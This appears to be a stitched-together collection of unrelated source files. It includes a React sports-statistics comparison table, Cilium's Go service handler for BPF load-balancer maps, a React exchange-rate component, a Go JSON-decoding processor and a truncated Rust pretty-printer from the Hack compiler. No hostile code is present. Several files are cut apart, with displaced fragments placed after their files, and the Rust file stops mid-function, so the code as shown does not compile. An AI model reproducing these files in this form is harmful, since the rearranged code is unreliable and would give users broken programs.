<tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homescorerpunkte, this.props.awayscorerpunkte) }-light`}>{ this.props.homescorer }&nbsp;({ this.props.homescorerpunkte } Punkte)</span></td> <td className="middle" align="center">Topscorer</td> <td><span className={`bg-${ this.getColor(this.props.awayscorerpunkte, this.props.homescorerpunkte) }-light`}>{ this.props.awayscorer }&nbsp;({ this.props.awayscorerpunkte } Punkte)</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homegefahrpunkte, this.props.awaygefahrpunkte) }-light`}>{ this.props.homegefahr }&nbsp;({ this.props.homegefahrpunkte } Tore)</span></td> <td className="middle" align="center">Gefährlich</td> <td><span className={`bg-${ this.getColor(this.props.awaygefahrpunkte, this.props.homegefahrpunkte) }-light`}>{ this.props.awaygefahr }&nbsp;({ this.props.awaygefahrpunkte } Tore)</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homebadboypunkte, this.props.awaybadboypunkte) }-light`}>{ this.props.homebadboy }&nbsp;({ this.props.homebadboypunkte } Minuten)</span></td> <td className="middle" align="center">Bad Boy</td> <td><span className={`bg-${ this.getColor(this.props.awaybadboypunkte, this.props.homebadboypunkte) }-light`}>{ this.props.awaybadboy }&nbsp;({ this.props.awaybadboypunkte } Minuten)</span></td> </tr> <tr> <td align="right"> <TeamLogo logo={this.props.hometeam.logo} alt={this.props.hometeam.name} width={100} height={100}/> </td> <td>&nbsp;</td> <td> <TeamLogo logo={this.props.awayteam.logo} alt={this.props.awayteam.name} width={100} height={100}/> </td> </tr> </tbody> </table> </section> ) } } export { Compare }
<td className="middle" align="center">Tore</td> <td><span className={`bg-${ this.getColor(this.props.awaytore - this.props.awaygegentore, this.props.hometore - this.props.homegegentore) }-light`}>{ this.props.awaytore }:{ this.props.awaygegentore}</span></td> </tr>
service.go
// Copyright 2019 Authors of Cilium // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package service import ( "fmt" "net" "github.com/cilium/cilium/pkg/bpf" "github.com/cilium/cilium/pkg/counter" lb "github.com/cilium/cilium/pkg/loadbalancer" "github.com/cilium/cilium/pkg/lock" "github.com/cilium/cilium/pkg/logging/logfields" "github.com/cilium/cilium/pkg/maps/lbmap" "github.com/cilium/cilium/pkg/metrics" "github.com/sirupsen/logrus" ) var ( updateMetric = metrics.ServicesCount.WithLabelValues("update") deleteMetric = metrics.ServicesCount.WithLabelValues("delete") addMetric = metrics.ServicesCount.WithLabelValues("add") ) // LBMap is the interface describing methods for manipulating service maps. type LBMap interface { UpsertService(uint16, net.IP, uint16, []uint16, int, bool) error DeleteService(lb.L3n4AddrID, int) error AddBackend(uint16, net.IP, uint16, bool) error DeleteBackendByID(uint16, bool) error DumpServiceMaps() ([]*lb.SVC, []error) DumpBackendMaps() ([]*lb.Backend, error) } type svcInfo struct { hash string frontend lb.L3n4AddrID backends []lb.Backend backendByHash map[string]*lb.Backend svcType lb.SVCType svcName string svcNamespace string restoredFromDatapath bool } func (svc *svcInfo) deepCopyToLBSVC() *lb.SVC { backends := make([]lb.Backend, len(svc.backends)) for i, backend := range svc.backends { backends[i] = *backend.DeepCopy() } return &lb.SVC{ Frontend: *svc.frontend.DeepCopy(), Backends: backends, Type: svc.svcType, Name: svc.svcName, Namespace: svc.svcNamespace, } } // Service is a service handler. Its main responsibility is to reflect // service-related changes into BPF maps used by datapath BPF programs. // The changes can be triggered either by k8s_watcher or directly by // API calls to the /services endpoint. type Service struct { lock.RWMutex svcByHash map[string]*svcInfo svcByID map[lb.ID]*svcInfo backendRefCount counter.StringCounter backendByHash map[string]*lb.Backend lbmap LBMap } // NewService creates a new instance of the service handler. func NewService() *Service { return &Service{ svcByHash: map[string]*svcInfo{}, svcByID: map[lb.ID]*svcInfo{}, backendRefCount: counter.StringCounter{}, backendByHash: map[string]*lb.Backend{}, lbmap: &lbmap.LBBPFMap{}, } } // InitMaps opens or creates BPF maps used by services. // // If restore is set to false, entries of the maps are removed. func (s *Service) InitMaps(ipv6, ipv4, restore bool) error { s.Lock() defer s.Unlock() // The following two calls can be removed in v1.8+. if err := bpf.UnpinMapIfExists("cilium_lb6_rr_seq_v2"); err != nil { return nil } if err := bpf.UnpinMapIfExists("cilium_lb4_rr_seq_v2"); err != nil { return nil } toOpen := []*bpf.Map{} toDelete := []*bpf.Map{} if ipv6 { toOpen = append(toOpen, lbmap.Service6MapV2, lbmap.Backend6Map, lbmap.RevNat6Map) if !restore { toDelete = append(toDelete, lbmap.Service6MapV2, lbmap.Backend6Map, lbmap.RevNat6Map) } } if ipv4
for _, m := range toOpen { if _, err := m.OpenOrCreate(); err != nil { return err } } for _, m := range toDelete { if err := m.DeleteAll(); err != nil { return err } } return nil } // UpsertService inserts or updates the given service. // // The first return value is true if the service hasn't existed before. func (s *Service) UpsertService( frontend lb.L3n4AddrID, backends []lb.Backend, svcType lb.SVCType, svcName, svcNamespace string) (bool, lb.ID, error) { s.Lock() defer s.Unlock() scopedLog := log.WithFields(logrus.Fields{ logfields.ServiceIP: frontend.L3n4Addr, logfields.Backends: backends, logfields.ServiceType: svcType, logfields.ServiceName: svcName, logfields.ServiceNamespace: svcNamespace, }) scopedLog.Debug("Upserting service") // If needed, create svcInfo and allocate service ID svc, new, err := s.createSVCInfoIfNotExist(frontend, svcType, svcName, svcNamespace) if err != nil { return false, lb.ID(0), err } // TODO(brb) defer ServiceID release after we have a lbmap "rollback" scopedLog = scopedLog.WithField(logfields.ServiceID, svc.frontend.ID) scopedLog.Debug("Acquired service ID") prevBackendCount := len(svc.backends) backendsCopy := []lb.Backend{} for _, b := range backends { backendsCopy = append(backendsCopy, *b.DeepCopy()) } // Update backends cache and allocate/release backend IDs newBackends, obsoleteBackendIDs, err := s.updateBackendsCacheLocked(svc, backendsCopy) if err != nil { return false, lb.ID(0), err } // Update lbmaps (BPF service maps) if err = s.upsertServiceIntoLBMaps(svc, prevBackendCount, newBackends, obsoleteBackendIDs, scopedLog); err != nil { return false, lb.ID(0), err } if new { addMetric.Inc() } else { updateMetric.Inc() } return new, lb.ID(svc.frontend.ID), nil } // DeleteServiceByID removes a service identified by the given ID. func (s *Service) DeleteServiceByID(id lb.ServiceID) (bool, error) { s.Lock() defer s.Unlock() if svc, found := s.svcByID[lb.ID(id)]; found { return true, s.deleteServiceLocked(svc) } return false, nil } // DeleteService removes the given service. func (s *Service) DeleteService(frontend lb.L3n4Addr) (bool, error) { s.Lock() defer s.Unlock() if svc, found := s.svcByHash[frontend.Hash()]; found { return true, s.deleteServiceLocked(svc) } return false, nil } // GetDeepCopyServiceByID returns a deep-copy of a service identified with // the given ID. // // If a service cannot be found, returns false. func (s *Service) GetDeepCopyServiceByID(id lb.ServiceID) (*lb.SVC, bool) { s.RLock() defer s.RUnlock() svc, found := s.svcByID[lb.ID(id)] if !found { return nil, false } return svc.deepCopyToLBSVC(), true } // GetDeepCopyServices returns a deep-copy of all installed services. func (s *Service) GetDeepCopyServices() []*lb.SVC { s.RLock() defer s.RUnlock() svcs := make([]*lb.SVC, 0, len(s.svcByHash)) for _, svc := range s.svcByHash { svcs = append(svcs, svc.deepCopyToLBSVC()) } return svcs } // RestoreServices restores services from BPF maps. // // The method should be called once before establishing a connectivity // to kube-apiserver. func (s *Service) RestoreServices() error { s.Lock() defer s.Unlock() // Restore backend IDs if err := s.restoreBackendsLocked(); err != nil { return err } // Restore service cache from BPF maps if err := s.restoreServicesLocked(); err != nil { return err } // Remove obsolete backends and release their IDs if err := s.deleteOrphanBackends(); err != nil { log.WithError(err).Warn("Failed to remove orphan backends") } return nil } // SyncWithK8sFinished removes services which we haven't heard about during // a sync period of cilium-agent's k8s service cache. // // The removal is based on an assumption that during the sync period // UpsertService() is going to be called for each alive service. func (s *Service) SyncWithK8sFinished() error { s.Lock() defer s.Unlock() for _, svc := range s.svcByHash { if svc.restoredFromDatapath { log.WithFields(logrus.Fields{ logfields.ServiceID: svc.frontend.ID, logfields.L3n4Addr: logfields.Repr(svc.frontend.L3n4Addr)}). Warn("Deleting no longer present service") if err := s.deleteServiceLocked(svc); err != nil { return fmt.Errorf("Unable to remove service %+v: %s", svc, err) } } } return nil } func (s *Service) createSVCInfoIfNotExist(frontend lb.L3n4AddrID, svcType lb.SVCType, svcName, svcNamespace string) (*svcInfo, bool, error) { hash := frontend.Hash() svc, found := s.svcByHash[hash] if !found { // Allocate service ID for the new service addrID, err := AcquireID(frontend.L3n4Addr, uint32(frontend.ID)) if err != nil { return nil, false, fmt.Errorf("Unable to allocate service ID %d for %q: %s", frontend.ID, frontend, err) } frontend.ID = addrID.ID svc = &svcInfo{ hash: hash, frontend: frontend, backendByHash: map[string]*lb.Backend{}, svcType: svcType, svcName: svcName, svcNamespace: svcNamespace, } s.svcByID[frontend.ID] = svc s.svcByHash[hash] = svc } else { // NOTE: We cannot restore svcType from BPF maps, so just set it // each time (safe until GH#8700 has been fixed). svc.svcType = svcType // Name and namespace are both optional and intended for exposure via // API. They they are not part of any BPF maps and cannot be restored // from datapath. if svcName != "" { svc.svcName = svcName } if svcNamespace != "" { svc.svcNamespace = svcNamespace } // We have heard about the service from k8s, so unset the flag so that // SyncWithK8sFinished() won't consider the service obsolete, and thus // won't remove it. svc.restoredFromDatapath = false } return svc, !found, nil } func (s *Service) upsertServiceIntoLBMaps(svc *svcInfo, prevBackendCount int, newBackends []lb.Backend, obsoleteBackendIDs []lb.BackendID, scopedLog *logrus.Entry) error { ipv6 := svc.frontend.IsIPv6() // Add new backends into BPF maps for _, b := range newBackends { scopedLog.WithFields(logrus.Fields{ logfields.BackendID: b.ID, logfields.L3n4Addr: b.L3n4Addr, }).Debug("Adding new backend") if err := s.lbmap.AddBackend(uint16(b.ID), b.L3n4Addr.IP, b.L3n4Addr.L4Addr.Port, ipv6); err != nil { return err } } // Upsert service entries into BPF maps backendIDs := make([]uint16, len(svc.backends)) for i, b := range svc.backends { backendIDs[i] = uint16(b.ID) } err := s.lbmap.UpsertService( uint16(svc.frontend.ID), svc.frontend.L3n4Addr.IP, svc.frontend.L3n4Addr.L4Addr.Port, backendIDs, prevBackendCount, ipv6) if err != nil { return err } // Remove backends not used by any service from BPF maps for _, id := range obsoleteBackendIDs { scopedLog.WithField(logfields.BackendID, id). Debug("Removing obsolete backend") if err := s.lbmap.DeleteBackendByID(uint16(id), ipv6); err != nil { log.WithError(err).WithField(logfields.BackendID, id). Warn("Failed to remove backend from maps") } } return nil } func (s *Service) restoreBackendsLocked() error { backends, err := s.lbmap.DumpBackendMaps() if err != nil { return fmt.Errorf("Unable to dump backend maps: %s", err) } for _, b := range backends { log.WithFields(logrus.Fields{ logfields.BackendID: b.ID, logfields.L3n4Addr: b.L3n4Addr.String(), }).Debug("Restoring backend") if err := RestoreBackendID(b.L3n4Addr, b.ID); err != nil { return fmt.Errorf("Unable to restore backend ID %d for %q: %s", b.ID, b.L3n4Addr, err) } hash := b.L3n4Addr.Hash() s.backendByHash[hash] = b } return nil } func (s *Service) deleteOrphanBackends() error { for hash, b := range s.backendByHash { if s.backendRefCount[hash] == 0 { log.WithField(logfields.BackendID, b.ID). Debug("Removing orphan backend") DeleteBackendID(b.ID) if err := s.lbmap.DeleteBackendByID(uint16(b.ID), b.L3n4Addr.IsIPv6()); err != nil { return fmt.Errorf("Unable to remove backend %d from map: %s", b.ID, err) } delete(s.backendByHash, hash) } } return nil } func (s *Service) restoreServicesLocked() error { failed, restored := 0, 0 svcs, errors := s.lbmap.DumpServiceMaps() for _, err := range errors { log.WithError(err).Warning("Error occurred while dumping service maps") } for _, svc := range svcs { scopedLog := log.WithFields(logrus.Fields{ logfields.ServiceID: svc.Frontend.ID, logfields.ServiceIP: svc.Frontend.L3n4Addr.String(), }) scopedLog.Debug("Restoring service") if _, err := RestoreID(svc.Frontend.L3n4Addr, uint32(svc.Frontend.ID)); err != nil { failed++ scopedLog.WithError(err).Warning("Unable to restore service ID") } newSVC := &svcInfo{ hash: svc.Frontend.Hash(), frontend: svc.Frontend, backends: svc.Backends, backendByHash: map[string]*lb.Backend{}, // Correct service type will be restored by k8s_watcher after k8s // service cache has been initialized svcType: lb.SVCTypeClusterIP, // Indicate that the svc was restored from the BPF maps, so that // SyncWithK8sFinished() could remove services which were restored // from the maps but not present in the k8sServiceCache (e.g. a svc // was deleted while cilium-agent was down). restoredFromDatapath: true, } for j, backend := range svc.Backends { hash := backend.L3n4Addr.Hash() s.backendRefCount.Add(hash) newSVC.backendByHash[hash] = &svc.Backends[j] } s.svcByHash[newSVC.hash] = newSVC s.svcByID[newSVC.frontend.ID] = newSVC restored++ } log.WithFields(logrus.Fields{ "restored": restored, "failed": failed, }).Info("Restored services from maps") return nil } func (s *Service) deleteServiceLocked(svc *svcInfo) error { obsoleteBackendIDs := s.deleteBackendsFromCacheLocked(svc) scopedLog := log.WithFields(logrus.Fields{ logfields.ServiceID: svc.frontend.ID, logfields.ServiceIP: svc.frontend.L3n4Addr, logfields.Backends: svc.backends, }) scopedLog.Debug("Deleting service") if err := s.lbmap.DeleteService(svc.frontend, len(svc.backends)); err != nil { return err } delete(s.svcByHash, svc.hash) delete(s.svcByID, svc.frontend.ID) ipv6 := svc.frontend.L3n4Addr.IsIPv6() for _, id := range obsoleteBackendIDs { scopedLog.WithField(logfields.BackendID, id). Debug("Deleting obsolete backend") if err := s.lbmap.DeleteBackendByID(uint16(id), ipv6); err != nil { return err } } if err := DeleteID(uint32(svc.frontend.ID)); err != nil { return fmt.Errorf("Unable to release service ID %d: %s", svc.frontend.ID, err) } deleteMetric.Inc() return nil } func (s *Service) updateBackendsCacheLocked(svc *svcInfo, backends []lb.Backend) ( []lb.Backend, []lb.BackendID, error) { obsoleteBackendIDs := []lb.BackendID{} newBackends := []lb.Backend{} backendSet := map[string]struct{}{} for i, backend := range backends { hash := backend.L3n4Addr.Hash() backendSet[hash] = struct{}{} if b, found := svc.backendByHash[hash]; !found { if s.backendRefCount.Add(hash) { id, err := AcquireBackendID(backend.L3n4Addr) if err != nil { return nil, nil, fmt.Errorf("Unable to acquire backend ID for %q: %s", backend.L3n4Addr, err) } backends[i].ID = id newBackends = append(newBackends, backends[i]) // TODO make backendByHash by value not by ref s.backendByHash[hash] = &backends[i] } else { backends[i].ID = s.backendByHash[hash].ID } svc.backendByHash[hash] = &backends[i] } else { backends[i].ID = b.ID } } for hash, backend := range svc.backendByHash { if _, found := backendSet[hash]; !found { if s.backendRefCount.Delete(hash) { DeleteBackendID(backend.ID) delete(s.backendByHash, hash) obsoleteBackendIDs = append(obsoleteBackendIDs, backend.ID) } delete(svc.backendByHash, hash) } } svc.backends = backends return newBackends, obsoleteBackendIDs, nil } func (s *Service) deleteBackendsFromCacheLocked(svc *svcInfo) []lb.BackendID { obsoleteBackendIDs := []lb.BackendID{} for hash, backend := range svc.backendByHash { if s.backendRefCount.Delete(hash) { DeleteBackendID(backend.ID) obsoleteBackendIDs = append(obsoleteBackendIDs, backend.ID) } } return obsoleteBackendIDs }
{ toOpen = append(toOpen, lbmap.Service4MapV2, lbmap.Backend4Map, lbmap.RevNat4Map) if !restore { toDelete = append(toDelete, lbmap.Service4MapV2, lbmap.Backend4Map, lbmap.RevNat4Map) } }
ExchangeRate.js
import React from 'react'; import PropTypes from 'prop-types'; import Box from '@material-ui/core/Box'; import styled from '@material-ui/core/styles/styled'; import getCurrencySymbol from '../utils/getCurrencySymbol'; import currencies from '../constants/currencies'; const ExchangeRateWrapper = styled(Box)({ display: 'flex', justifyContent: 'center', }); const ExchangeRateContent = styled(Box)({ textAlign: 'center', }); const ExchangeRate = ({ from, to }) => ( <ExchangeRateWrapper mb={3}> <ExchangeRateContent> <Box component="h2">Exchange Rate</Box> <Box component="span"> {getCurrencySymbol(from.currency)} {from.value} = {getCurrencySymbol(to.currency)} {to.value} </Box> </ExchangeRateContent> </ExchangeRateWrapper> ); ExchangeRate.propTypes = { from: PropTypes.shape({
currency: PropTypes.oneOf(currencies), value: PropTypes.number, }), to: PropTypes.shape({ currency: PropTypes.oneOf(currencies), value: PropTypes.number, }), }; ExchangeRate.defaultProps = { from: { currency: 'EUR', value: 1, }, to: { currency: 'GBP', value: 1, }, }; export default ExchangeRate;
json.go
package parse import ( "encoding/json" "github.com/urbint/ingest" "github.com/urbint/ingest/utils" "io" "reflect" "runtime" "strings" "sync" ) type ( // A JSONProcessor is used to process JSON via encoding/json JSONProcessor struct { mapper interface{} newInstance func() reflect.Value logger ingest.Logger workerOut chan interface{} workerWg sync.WaitGroup workerErr chan error workersWorking chan bool workerQuit chan bool opts *JSONOpts sendPtr bool } // JSONOpts are options used to configre a JSONProcessor (and an FFJSONProcessor) JSONOpts struct { AbortOnFailedObject bool Selector string NumDecoders int Logger ingest.Logger } ) // JSON returns an *parse.JSONProcessor which will decode a JSON file to a specified struct func JSON(mapper interface{}, opts ...JSONOpts) *JSONProcessor { opt := defaultJSONOpts() if len(opts) != 0 { utils.Extend(&opt, opts[0]) } indirectType := reflect.Indirect(reflect.ValueOf(mapper)).Type() return &JSONProcessor{ workersWorking: make(chan bool, opt.NumDecoders), workerErr: make(chan error, opt.NumDecoders), workerOut: make(chan interface{}, opt.NumDecoders), workerWg: sync.WaitGroup{}, newInstance: func() reflect.Value { return reflect.New(indirectType) }, mapper: mapper, sendPtr: reflect.TypeOf(mapper).Kind() == reflect.Ptr, logger: opt.Logger, opts: &opt, } } func defaultJSONOpts() JSONOpts { return JSONOpts{ NumDecoders: runtime.NumCPU(), Logger: ingest.DefaultLogger, } } // Name implements ingest.Runner for JSONProcessor func (j *JSONProcessor) Name() string { return "JSON" } // Run implements ingest.Runner for JSONProcessor func (j *JSONProcessor) Run(stage *ingest.Stage) error { j.workerQuit = make(chan bool) j.workerOut = make(chan interface{}, j.opts.NumDecoders) defer func() { close(j.workerQuit) }() in := stage.In for { select { case <-stage.Abort: return nil
if !more { return nil } stage.Out <- data case err := <-j.workerErr: if j.opts.AbortOnFailedObject { return err } log := j.logger.WithError(err) if asUnmarshalTypeErr, isUnmarshalTypeErr := err.(*json.UnmarshalTypeError); isUnmarshalTypeErr { log = log.WithField("offset", asUnmarshalTypeErr.Offset).WithField("value", asUnmarshalTypeErr.Value) } log.Warn("Error unmarshalling JSON record") case input, ok := <-in: if !ok { // Set input to nil to not go in here any more, then wait for all the workers // to finish processing before closing output in = nil go func() { j.workerWg.Wait() close(j.workerOut) }() continue } rc, err := utils.ToIOReadCloser(input) if err != nil { return err } go j.handleIO(rc) } } } func (j *JSONProcessor) handleIO(rc io.ReadCloser) { j.workersWorking <- true j.workerWg.Add(1) go func() { defer func() { rc.Close() j.workerWg.Done() <-j.workersWorking }() decoder := json.NewDecoder(rc) if j.opts.Selector != "" { if err := j.navigateToSelection(decoder); err != nil { j.workerErr <- err return } } for { select { case <-j.workerQuit: return default: if !decoder.More() { return } rec := j.newInstance() if err := decoder.Decode(rec.Interface()); err != nil { if err == io.EOF { return } j.workerErr <- err continue } var toSend interface{} if j.sendPtr { toSend = rec.Interface() } else { toSend = rec.Elem().Interface() } select { case <-j.workerQuit: return case j.workerOut <- toSend: } } } }() } func (j *JSONProcessor) navigateToSelection(decoder *json.Decoder) error { nestIn := strings.Split(j.opts.Selector, ".") for len(nestIn) > 0 { token, err := decoder.Token() if err != nil { return err } if token == nestIn[0] { nestIn = nestIn[1:] continue } else if nestIn[0] == "*" { if delimVal, isDelim := token.(json.Delim); isDelim && json.Delim('[') == delimVal { nestIn = nestIn[1:] } continue } } return nil } // SkipAbortErr saves us having to send nil errors back on abort func (j *JSONProcessor) SkipAbortErr() bool { return true } // SetSelection implements ingest.Selectable for JSONProcessor func (j *JSONProcessor) SetSelection(selection ...string) { if len(selection) > 0 { j.opts.Selector = selection[0] } }
case data, more := <-j.workerOut:
print.rs
// Copyright (c) Facebook, Inc. and its affiliates. // // This source code is licensed under the MIT license found in the // LICENSE file in the "hack" directory of this source tree. use crate::{ context::Context, write::{self, Error}, }; use bstr::{BString, ByteSlice}; use core_utils_rust::add_ns; use error::ErrorKind; use hhbc::{hhas_body::HhasBodyEnv, ClassName}; use hhbc_string_utils::{ integer, is_class, is_parent, is_self, is_static, is_xhp, lstrip, lstrip_bslice, mangle, strip_global_ns, strip_ns, types, }; use lazy_static::lazy_static; use naming_special_names_rust::classes; use oxidized::{ ast, ast_defs::{self, ParamKind}, local_id, }; use regex::Regex; use std::{ borrow::Cow, io::{Result, Write}, write, }; use write_bytes::write_bytes; pub struct ExprEnv<'arena, 'e> { pub codegen_env: Option<&'e HhasBodyEnv<'arena>>, } fn print_key_value( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, k: &ast::Expr, v: &ast::Expr, ) -> Result<()> { print_key_value_(ctx, w, env, k, print_expr, v) } fn print_key_value_<K, KeyPrinter>( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, k: K, mut kp: KeyPrinter, v: &ast::Expr, ) -> Result<()> where KeyPrinter: FnMut(&Context<'_>, &mut dyn Write, &ExprEnv<'_, '_>, K) -> Result<()>, { kp(ctx, w, env, k)?; w.write_all(b" => ")?; print_expr(ctx, w, env, v) } fn print_afield( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, afield: &ast::Afield, ) -> Result<()> { use ast::Afield as A; match afield { A::AFvalue(e) => print_expr(ctx, w, env, e), A::AFkvalue(k, v) => print_key_value(ctx, w, env, k, v), } } fn print_afields( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, afields: impl AsRef<[ast::Afield]>, ) -> Result<()> { write::concat_by(w, ", ", afields, |w, i| print_afield(ctx, w, env, i)) } fn print_uop(w: &mut dyn Write, op: ast::Uop) -> Result<()> { use ast::Uop as U; w.write_all(match op { U::Utild => b"~", U::Unot => b"!", U::Uplus => b"+", U::Uminus => b"-", U::Uincr => b"++", U::Udecr => b"--", U::Usilence => b"@", U::Upincr | U::Updecr => { return Err(Error::fail("string_of_uop - should have been captures earlier").into()); } }) } fn print_key_values_<K, KeyPrinter>( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, mut kp: KeyPrinter, kvs: impl AsRef<[(K, ast::Expr)]>, ) -> Result<()> where KeyPrinter: Fn(&Context<'_>, &mut dyn Write, &ExprEnv<'_, '_>, &K) -> Result<()>, { write::concat_by(w, ", ", kvs, |w, (k, v)| { print_key_value_(ctx, w, env, k, &mut kp, v) }) } fn print_expr_darray<K, KeyPrinter>( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, kp: KeyPrinter, kvs: impl AsRef<[(K, ast::Expr)]>, ) -> Result<()> where KeyPrinter: Fn(&Context<'_>, &mut dyn Write, &ExprEnv<'_, '_>, &K) -> Result<()>, { write::wrap_by_(w, "darray[", "]", |w| { print_key_values_(ctx, w, env, kp, kvs) }) } fn print_expr_varray( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, varray: &[ast::Expr], ) -> Result<()> { write::wrap_by_(w, "varray[", "]", |w| { write::concat_by(w, ", ", varray, |w, e| print_expr(ctx, w, env, e)) }) } fn print_shape_field_name( _: &Context<'_>, w: &mut dyn Write, _: &ExprEnv<'_, '_>, field: &ast::ShapeFieldName, ) -> Result<()> { use ast::ShapeFieldName as S; match field { S::SFlitInt((_, s)) => print_expr_int(w, s.as_ref()), S::SFlitStr((_, s)) => print_expr_string(w, s), S::SFclassConst(_, (_, s)) => print_expr_string(w, s.as_bytes()), } } fn print_expr_int(w: &mut dyn Write, i: &str) -> Result<()> { match integer::to_decimal(i) { Ok(s) => w.write_all(s.as_bytes()), Err(_) => Err(Error::fail("ParseIntError").into()), } } fn print_expr_string(w: &mut dyn Write, s: &[u8]) -> Result<()> { fn escape_char(c: u8) -> Option<Cow<'static, [u8]>> { match c { b'\n' => Some((&b"\\\\n"[..]).into()), b'\r' => Some((&b"\\\\r"[..]).into()), b'\t' => Some((&b"\\\\t"[..]).into()), b'\\' => Some((&b"\\\\\\\\"[..]).into()), b'"' => Some((&b"\\\\\\\""[..]).into()), b'$' => Some((&b"\\\\$"[..]).into()), c if escaper::is_lit_printable(c) => None, c => { let mut r = vec![]; write!(r, "\\\\{:03o}", c).unwrap(); Some(r.into()) } } } write::wrap_by(w, "\\\"", |w| { w.write_all(&escaper::escape_bstr_by(s.as_bstr().into(), escape_char)) }) } fn print_expr_to_string( ctx: &Context<'_>, env: &ExprEnv<'_, '_>, expr: &ast::Expr, ) -> Result<BString> { let mut buf = Vec::new(); print_expr(ctx, &mut buf, env, expr).map_err(|e| match write::into_error(e) { Error::NotImpl(m) => Error::NotImpl(m), e => Error::Fail(format!("Failed: {}", e)), })?; Ok(buf.into()) } fn print_expr( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, ast::Expr(_, _, expr): &ast::Expr, ) -> Result<()> { fn adjust_id<'a>(env: &ExprEnv<'_, '_>, id: &'a str) -> Cow<'a, str> { let s: Cow<'a, str> = match env.codegen_env { Some(env) => { if env.is_namespaced && id .as_bytes() .iter() .rposition(|c| *c == b'\\') .map_or(true, |i| i < 1) { strip_global_ns(id).into() } else { add_ns(id) } } _ => id.into(), }; escaper::escape(s) } fn print_expr_id<'a>(w: &mut dyn Write, env: &ExprEnv<'_, '_>, s: &'a str) -> Result<()> { w.write_all(adjust_id(env, s).as_bytes()) } fn fmt_class_name<'a>(is_class_constant: bool, id: Cow<'a, str>) -> Cow<'a, str> { let cn: Cow<'a, str> = if is_xhp(strip_global_ns(&id)) { escaper::escape(strip_global_ns(&mangle(id.into()))) .to_string() .into() } else { escaper::escape(strip_global_ns(&id)).to_string().into() }; if is_class_constant { format!("\\\\{}", cn).into() } else { cn } } fn get_class_name_from_id<'e>( ctx: &Context<'_>, env: Option<&'e HhasBodyEnv<'_>>, should_format: bool, is_class_constant: bool, id: &'e str, ) -> Cow<'e, str> { if id == classes::SELF || id == classes::PARENT || id == classes::STATIC { let name = ctx.special_class_resolver.resolve(env, id); return fmt_class_name(is_class_constant, name); } fn get<'a>(should_format: bool, is_class_constant: bool, id: &'a str) -> Cow<'a, str> { if should_format { fmt_class_name(is_class_constant, id.into()) } else { id.into() } } if env.is_some() { let alloc = bumpalo::Bump::new(); let class_id = ClassName::from_ast_name_and_mangle(&alloc, id); let id = class_id.unsafe_as_str(); get(should_format, is_class_constant, id) .into_owned() .into() } else { get(should_format, is_class_constant, id) } } fn handle_possible_colon_colon_class_expr( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, is_array_get: bool, e_: &ast::Expr_, ) -> Result<Option<()>> { match e_.as_class_const() { Some(( ast::ClassId(_, _, ast::ClassId_::CIexpr(ast::Expr(_, _, ast::Expr_::Id(id)))), (_, s2), )) if is_class(&s2) && !(is_self(&id.1) || is_parent(&id.1) || is_static(&id.1)) => { Ok(Some({ let s1 = get_class_name_from_id(ctx, env.codegen_env, false, false, &id.1); if is_array_get { print_expr_id(w, env, s1.as_ref())? } else { print_expr_string(w, s1.as_bytes())? } })) } _ => Ok(None), } } use ast::Expr_; match expr { Expr_::Id(id) => print_expr_id(w, env, id.1.as_ref()), Expr_::Lvar(lid) => w.write_all(escaper::escape(&(lid.1).1).as_bytes()), Expr_::Float(f) => { if f.contains('E') || f.contains('e') { let s = format!( "{:.1E}", f.parse::<f64>() .map_err(|_| Error::fail(format!("ParseFloatError: {}", f)))? ) // to_uppercase() here because s might be "inf" or "nan" .to_uppercase(); lazy_static! { static ref UNSIGNED_EXP: Regex = Regex::new(r"(?P<first>E)(?P<second>\d+)").unwrap(); static ref SIGNED_SINGLE_DIGIT_EXP: Regex = Regex::new(r"(?P<first>E[+-])(?P<second>\d$)").unwrap(); } // turn mEn into mE+n let s = UNSIGNED_EXP.replace(&s, "${first}+${second}"); // turn mE+n or mE-n into mE+0n or mE-0n (where n is a single digit) let s = SIGNED_SINGLE_DIGIT_EXP.replace(&s, "${first}0${second}"); w.write_all(s.as_bytes()) } else { w.write_all(f.as_bytes()) } } Expr_::Int(i) => print_expr_int(w, i.as_ref()), Expr_::String(s) => print_expr_string(w, s), Expr_::Null => w.write_all(b"NULL"), Expr_::True => w.write_all(b"true"), Expr_::False => w.write_all(b"false"), // For arrays and collections, we are making a conscious decision to not // match HHMV has HHVM's emitter has inconsistencies in the pretty printer // https://fburl.com/tzom2qoe Expr_::Collection(c) if (c.0).1 == "vec" || (c.0).1 == "dict" || (c.0).1 == "keyset" => { w.write_all((c.0).1.as_bytes())?; write::square(w, |w| print_afields(ctx, w, env, &c.2)) } Expr_::Collection(c) => { let name = strip_ns((c.0).1.as_str()); let name = types::fix_casing(name); match name { "Set" | "Pair" | "Vector" | "Map" | "ImmSet" | "ImmVector" | "ImmMap" => { w.write_all(b"HH\\\\")?; w.write_all(name.as_bytes())?; write::wrap_by_(w, " {", "}", |w| { Ok(if !c.2.is_empty() { w.write_all(b" ")?; print_afields(ctx, w, env, &c.2)?; w.write_all(b" ")?; }) }) } _ => Err( Error::fail(format!("Default value for an unknow collection - {}", name)) .into(), ), } } Expr_::Shape(fl) => print_expr_darray(ctx, w, env, print_shape_field_name, fl), Expr_::Binop(x) => { let (bop, e1, e2) = &**x; print_expr(ctx, w, env, e1)?; w.write_all(b" ")?; print_bop(w, bop)?; w.write_all(b" ")?; print_expr(ctx, w, env, e2) } Expr_::Call(c) => { let (e, _, es, unpacked_element) = &**c; match e.as_id() { 